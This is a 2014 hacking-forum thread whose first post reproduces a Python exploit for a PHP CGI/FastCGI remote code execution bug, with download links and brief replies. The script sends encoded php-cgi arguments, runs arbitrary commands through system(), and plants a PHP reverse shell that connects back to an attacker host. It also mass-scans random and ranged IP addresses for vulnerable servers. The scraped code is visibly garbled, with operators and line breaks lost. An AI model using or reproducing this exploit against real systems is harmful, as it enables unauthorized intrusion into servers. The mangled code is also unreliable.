Hello There, Guest! Login Register
Logo
Dismiss this notice
MaDLeeTs is not responsible for any attacks that are carried out on networks, websites or servers.
MaDLeeTs staff members cannot be held responsible.
All information on this forum is for educational purposes only.


PHP 5.x + FastCGI Remote Code Execution Vulnerability (PoC)

  • 0 Vote(s) - 0 Average


02-01-2014, 05:19 PM #1
AL1R3Z4 Offline Respected *****
Respected
Posts:51 Threads:14 Joined:Jan 2014 Reputation: 3
Mood: None
hi bro.s
http://1337day.com/exploit/description/21471

PHP Code:
#!/usr/bin/env python

#

# ap-unlock-v2.py - apache + PHP 5.x + FastCGI Remote Code Execution Vulnerability 0day (better version)

#

# NOTE:

#   - quick'n'dirty VERY UGLYY C=000DEEE IZ N0T MY STYLE :(((

#   - for connect back shell start netcat/nc and bind port on given host:port

#   - is ip-range scanner not is multithreaded, but iz multithreaded iz in

#   random scanner and is scanner from file (greets to MustLive)

#   - no ssl support

#   - more php paths can be added

#   - adjust this shit for windows b0xes

#

# 2013

# by noptrix - http://nullsecurity.net/



import sys

import socket

import argparse

import threading

import time

import random

import select





NONE 
0

VULN 
1

SCMD 
2

XPLT 
3



t3st 
'POST /cgi-bin/php/%63%67%69%6E/%70%68%70?%2D%64+%61%6C%75%6F%6E+%2D' \

        
'%64+%6D%6F%64+%2D%64+%73%75%68%6F%6E%3D%6F%6E+%2D%64+%75%6E%63%74%73' \

        
'%3D%22%22+%2D%64+%64%6E%65+%2D%64+%61%75%74%6F%5F%70%72%%74+%2D%64+' \

        
'%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+'\

        
'%74%5F%3D%30+%2D%64+%75%74+%2D%6E HTTP/1.1\r\nHost:localhost\r\n'\

        
'Content-Type: text/html\r\nContent-Length:1\r\n\r\na\r\n'





def m4ke_c0nn_b4ck_sh1t(cb_h0stcb_p0rt):

    
c0nn_b4ck = \

    
'''

    <? set_time_limit (0); $VERSION = "1.0"; $ip = "''' 
cb_h0st '''";

    $port = ''' 
cb_p0rt '''; $chunk_size = 1400; $write_a = null;

    $error_a = null; $shell = "unset HISTFILE; id; /bin/sh -i"; $daemon = 0;

    $debug = 0; if (function_exists("pcntl_fork")) {$pid = pcntl_fork();

    if ($pid == -1) {exit(1);}if ($pid) {exit(0);}if (posix_setsid() == -1) {

    exit(1);}$daemon = 1;} else {print "bla";}chdir("/");umask(0);

    $sock = fsockopen($ip, $port, $errno, $errstr, 30);if (!$sock) {

    printit("$errstr ($errno)");exit(1);}$descriptorspec = array(

    0 => array("pipe", "r"), 1 => array("pipe", "w"),2 => array("pipe", "w"));

    $process = proc_open($shell, $descriptorspec, $pipes);

    if (!is_resource($process)) {exit(1);}stream_set_blocking($pipes[1], 0);

    stream_set_blocking($pipes[2], 0);stream_set_blocking($sock, 0);

    printit("Successfully opened reverse shell to $ip:$port");while (1) {

    if (feof($sock)) {printit("ERROR: Shell connection terminated");break;}

    if (feof($pipes[1])) {printit("ERROR: Shell process terminated");break;}

    $read_a = array($sock, $pipes[1], $pipes[2]);

    $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

    if (in_array($sock, $read_a)) {if ($debug) printit("SOCK READ");

    $input = fread($sock, $chunk_size);if ($debug) printit("SOCK: $input");

    fwrite($pipes[0], $input);}if (in_array($pipes[1], $read_a)) {

    if ($debug) printit("STDOUT READ");$input = fread($pipes[1], $chunk_size);

    if ($debug) printit("STDOUT: $input");fwrite($sock, $input);}

    if (in_array($pipes[2], $read_a)) {if ($debug) printit("STDERR READ");

    $input = fread($pipes[2], $chunk_size);

    if ($debug) printit("STDERR: $input");fwrite($sock, $input);}}fclose($sock);

    fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($process);

    function printit ($string) {if (!$daemon) {print "$string\n";}}?>

    '''

    
return c0nn_b4ck





def enc0dez
():

    
n33dz1 = ('cgi-bin''php')

    
n33dz2 = ('-d''allow_url_include=on''-d''safe_mode=off''-d',

            
'suhosin.simulation=on''-d''disable_functions=""''-d',

            
'open_basedir=none''-d''auto_prepend_file=php://input',

            
'-d''cgi.force_redirect=0''-d''cgi.redirect_status_env=0',

            
'-d''auto_prepend_file=php://input''-n')

    
fl4g 0

    arg5 
''

    
p4th ''

    
plus ''

 

    
for x in n33dz2:

        if 
fl4g == 1:

            
plus '+'

        
arg5 arg5 plus + \

                
''.join('%' c.encode('utf-8').encode('hex') for c in x)

        
fl4g 1

    
for x in n33dz1:

        
p4th p4th '/' + \

                
''.join('%' c.encode('utf-8').encode('hex') for c in x)

    return (
p4th.upper(), arg5.upper())





def m4k3_p4yl0rd(p4yl0rdm0de):

    
p4tharg5 enc0dez()

    if 
m0de == VULN:

        
p4yl0rd t3st

    elif m0de 
== SCMD or m0de == XPLT:

        
p4yl0rd 'POST /' p4th '?' arg5 ' HTTP/1.1\r\n' \

                
'Host: ' sys.argv[1] + '\r\n' \

                
'Content-Type: application/x-www-form-urlencoded\r\n' \

                
'Content-Length: ' str(len(p4yl0rd)) + '\r\n\r\n' p4yl0rd

    
return p4yl0rd





def s3nd_sh1t
(argsm0dec0nn_b4ck):

    
pat '<b>Parse error</b>:'

    
try:

        
socket.socket(socket.AF_INETsocket.SOCK_STREAM)

        
s.settimeout(float(args.t))

        
res s.connect_ex((args.hint(args.p)))

        if 
res == 0:

            if 
m0de == VULN:

                
p4yl0rd m4k3_p4yl0rd(''m0de)

                
s.sendall(p4yl0rd)

                if 
pat in s.recv(4096):

                    print 
"--> " args." vu1n"

                    
return args.h

                
else:

                    if 
args.v:

                        print 
"--> %s n0t vu1n" % (args.h)

                    return

            
elif m0de == SCMD:

                
p4yl0rd m4k3_p4yl0rd('<? system("' args.'"); ?>'m0de)

                
s.sendall(p4yl0rd)

                
rdwdex select.select([s], [], [], float(args.t))

                if 
rd:

                    for 
line in s.makefile():

                        print 
line,

            
elif m0de == XPLT:

                
p4yl0rd m4k3_p4yl0rd(c0nn_b4ckm0de)

                
s.sendall(p4yl0rd)

        else:

            if 
args.v:

                print 
"--> n0 w3bs3rv3r 0n %s" % (args.h)

    
except socket.error:

        return

    return





def m4k3_r4nd_1p4ddr(num):

    
h0sts = []

    for 
x in range(int(num)):

        
h0sts.append('%d.%d.%d.%d' % (random.randrange(0,255),

                
random.randrange(0,255), random.randrange(0,255),

                
random.randrange(0,255)))

    return 
h0sts





def sc4n_r4nd0m
(argsh0stm0devu1nz):

    
args.h0st

    vu1nz
.append(s3nd_sh1t(argsm0deNone))

    
vu1nz filter(Nonevu1nz)

    return





def sc4n_fr0m_f1le(argsh0stm0devu1nz):

    
args.h0st.rstrip()

    
vu1nz.append(s3nd_sh1t(argsm0deNone))

    
vu1nz filter(Nonevu1nz)

    return





def sc4n_r4ng3(rsarsbargsm0de):

    
vu1nz = []

    for 
i in range (rsa[0], rsb[0]):

        for 
j in range (rsa[1], rsb[1]):

            for 
k in range (rsa[2], rsb[2]):

                for 
l in range(rsa[3], rsb[3]):

                    
args.str(i) + "." str(j) + "." str(k) + "." str(l)

                    
vu1nz.append(s3nd_sh1t(argsm0deNone))

                    
time.sleep(0.005)

    
vu1nz filter(Nonevu1nz)

    return 
vu1nz





def m4k3_ipv4_r4ng3
(iprange):

    
tuple(part for part in iprange.split('.'))

    
rsa = (range(4))

    
rsb = (range(4))

    for 
i in range(0,4):

        
ga a[i].find('-')

        if 
ga != -1:

            
rsa[i] = int(a[i][:ga])

            
rsb[i] = int(a[i][1+ga:]) + 1                                        

        
else:

            
rsa[i] = int(a[i])

            
rsb[i] = int(a[i]) + 1

    
return (rsarsb)





def parse_args():

    
argparse.ArgumentParser(

    
usage='\n\n  ./ap-unlock-v2.py -h <4rg> -s | -c <4rg> | -x <4rg> [0pt1ons]'\

            
'\n  ./ap-unlock-v2.py -r <4rg> | -R <4rg> | -i <4rg> [0pt1ons]',

    
formatter_class=argparse.RawDescriptionHelpFormatteradd_help=False)

    
opts p.add_argument_group('0pt1ons''')

    
opts.add_argument('-h'metavar='wh1t3h4tz.0rg',

            
help='| t3st s1ngle h0st f0r vu1n')

    
opts.add_argument('-p', default=80metavar='80',

            
help='| t4rg3t p0rt (d3fau1t: 80)')

    
opts.add_argument('-c'metavar='\'uname -a;id\'',

            
help='| s3nd c0mm4nds t0 h0st')

    
opts.add_argument('-x'metavar='192.168.0.2:1337',

            
help='| c0nn3ct b4ck h0st 4nd p0rt f0r sh3ll')

    
opts.add_argument('-s'action='store_true',

            
help='| t3st s1ngl3 h0st f0r vu1n')

    
opts.add_argument('-r'metavar='133.1.3-7.7-37',

            
help='| sc4nz iP addr3ss r4ng3 f0r vu1n')

    
opts.add_argument('-R'metavar='1337',

            
help='| sc4nz num r4nd0m h0st5 f0r vu1n')

    
opts.add_argument('-t', default=3metavar='3',

            
help='| t1me0ut in s3x (d3fau1t: 3)')

    
opts.add_argument('-f'metavar='vu1n.lst',

            
help='| wr1t3 vu1n h0sts t0 f1l3')

    
opts.add_argument('-i'metavar='sc4nz.lst',

            
help='| sc4nz h0sts fr0m f1le f0r vu1n')

    
opts.add_argument('-S'metavar='2',

            
help='| sl33pz in s3x b3tw33n thr3adz (d3fault: 2)')

    
opts.add_argument('-T', default=2metavar='4',

            
help='| nuM sc4n thr3adz (d3fault: 4)')

    
opts.add_argument('-v'action='store_true',

            
help='| pr1nt m0ah 1nf0z wh1l3 sh1tt1ng')

    
args p.parse_args()

    if 
not args.and not args.and not args.and not args.i:

        
p.print_help()

        
sys.exit(0)

    return 
args





def wr1te_fil3
(argsvu1nz):

    if 
args.f:

        if 
vu1nz:

            try:

                
open(args.f"w")

                
f.write("\n".join(vu1nz)+"\n")

                
f.close()

            
except:

                
sys.stderr.write('de1n3 mudd1 k0cht guT')

                
sys.stderr.write('\n')

                
raise SystemExit()

    return





def c0ntr0ller():

    
vu1nz = []

    
m0de NONE

    
try:

        
args parse_args()

        if 
not args.t:

            
args.float(3)

        if 
args.h:

            if 
args.s:

                print 
"[+] sc4nn1ng s1ngl3 h0st %s " % (args.h)

                
m0de VULN

                s3nd_sh1t
(argsm0deNone)

            
elif args.c:

                print 
"[+] s3nd1ng c0mm4ndz t0 h0st %s " % (args.h)

                
m0de SCMD

                s3nd_sh1t
(argsm0deNone)

            
elif args.x:

                print 
"[+] xpl0it1ng b0x %s " % (args.h)

                
m0de XPLT

                
if args.x.find(':') != -1:

                    if 
not args.x.split(':')[1]:

                        print 
"[-] 3rr0r: p0rt m1ss1ng"

                    
else:

                        
cb_h0st args.x.split(':')[0]

                        
cb_p0rt args.x.split(':')[1]

                else:

                    print 
"[-] 3rr0r: <h0st>:<p0rt> y0u l4m3r"

                
c0nn_b4ck m4ke_c0nn_b4ck_sh1t(cb_h0stcb_p0rt)

                
s3nd_sh1t(argsm0dec0nn_b4ck)

            else:

                print 
"[-] 3rr0r: m1ss1ng -s, -c 0r -x b1tch"

                
sys.exit(-1)

        if 
args.r:

            print 
"[+] sc4nn1ng r4ng3 %s " % (args.r)

            
m0de VULN

            rsa
rsb m4k3_ipv4_r4ng3(args.r)

            
vu1nz sc4n_r4ng3(rsarsbargsm0de)

        if 
args.R:

            print 
"[+] sc4nn1ng %d r4nd0m b0xes" % (int(args.R))

            
m0de VULN

            
if not args.S:

                
args.float(2)

            
h0sts m4k3_r4nd_1p4ddr(int(args.R))

            for 
h0st in h0sts:

                try:

                    
threading.Thread(target=sc4n_r4nd0margs=(argsh0st,

                        
m0devu1nz))

                    
t.start()

                    
time.sleep(float(args.S))

                    while 
threading.activeCount() > int(args.T):

                        
time.sleep(2)

                
except:

                    
sys.stdout.flush()

                    
sys.stdout.write("\b\b[!] w4rn1ng: ab0rt3d bY us3r\n")

                    
raise SystemExit

        
if args.i:

            print 
"[+] sc4nn1ng b0xes fr0m f1le %s" % (args.i)

            
m0de VULN

            h0sts 
tuple(open(args.i'r'))

            if 
not args.S:

                
args.float(2)

            for 
h0st in h0sts:

                try:

                    
threading.Thread(target=sc4n_fr0m_f1leargs=(args,

                        
h0stm0devu1nz))

                    
t.start()

                    
time.sleep(float(args.S))

                    while 
threading.activeCount() > int(args.T):

                        
time.sleep(2)

                
except KeyboardInterrupt:

                    
sys.stdout.flush()

                    
sys.stdout.write("\b\b[!] w4rn1ng: ab0rt3d bY us3r\n")

                    
raise SystemExit

            
#sc4n_fr0m_f1le(args, h0sts, m0de, vu1nz)

    
except KeyboardInterrupt:

        
sys.stdout.flush()

        
sys.stderr.write("\b\b[!] w4rn1ng: ab0rt3d bY us3r\n")

        
raise SystemExit

    wr1te_fil3
(argsvu1nz)



    return





def m41n():

    if  
__name__ == "__main__":

        print 
"--==[ ap-unlock-v2.py by [email protected] ]==--"

        
c0ntr0ller()

    else:

        print 
"[-] 3rr0r: y0u fuck3d up dud3"

        
sys.exit(1)

    print 
"[+] h0p3 1t h3lp3d"





# \o/ fr33 requiem 1337 h4x0rs ... 

m41n()



# e0F 
Full script in python file for dl:

python: http://www.speedyshare.com/GfTfH/download/FastCGI.py


dear [email protected] i update post ,sry

02-01-2014, 08:49 PM #2
Diizzy Offline cat /etc/passwd ***
TeaM MaDLeeTs
Posts:146 Threads:5 Joined:Jul 2013 Reputation: 1
Mood: Say What
Nice post . thanks Dude Biggrinsmiley ////

 
--------------------------------------
Facebook | Twitter

--------------------------------------

02-18-2014, 12:21 AM #3
[email protected] Offline MaDLeeTs LoVer *****
MaDLeeTs LoVer
Posts:357 Threads:87 Joined:Mar 2013 Reputation: 0
Mood: None

02-21-2014, 03:59 AM #4
umpire Offline Junior Member **
Registered
Posts:34 Threads:7 Joined:Jan 2014 Reputation: 0
Mood: None
Nice sharing... TNX
What is this error for?:

File "fast.py", line 63
'%64+%6D%6F%64+%2D%64+%73%75%68%6F%6E%3D%6F%6E+%2D%64+%75%6E%63%74%73' \
^
IndentationError: unexpected indent

????????????? ??????? ???? ??????? ????? ??????????
And hold fast to the bond of allah, together, and do not scatter
? ???? ?? ?????? ??? ??? ???? ? ??????? ?????

02-21-2014, 11:30 AM #5
!! hack-back !! Offline Junior Member **
Registered
Posts:13 Threads:5 Joined:May 2013 Reputation: 1
Mood: None
this bug is from 2009 and not 2013, this is not the new one in 1337day

http://www.madleets.com/Thread-apache%C2...%C2%A00day






Forum Jump:


Users browsing this thread:1 Guest(s)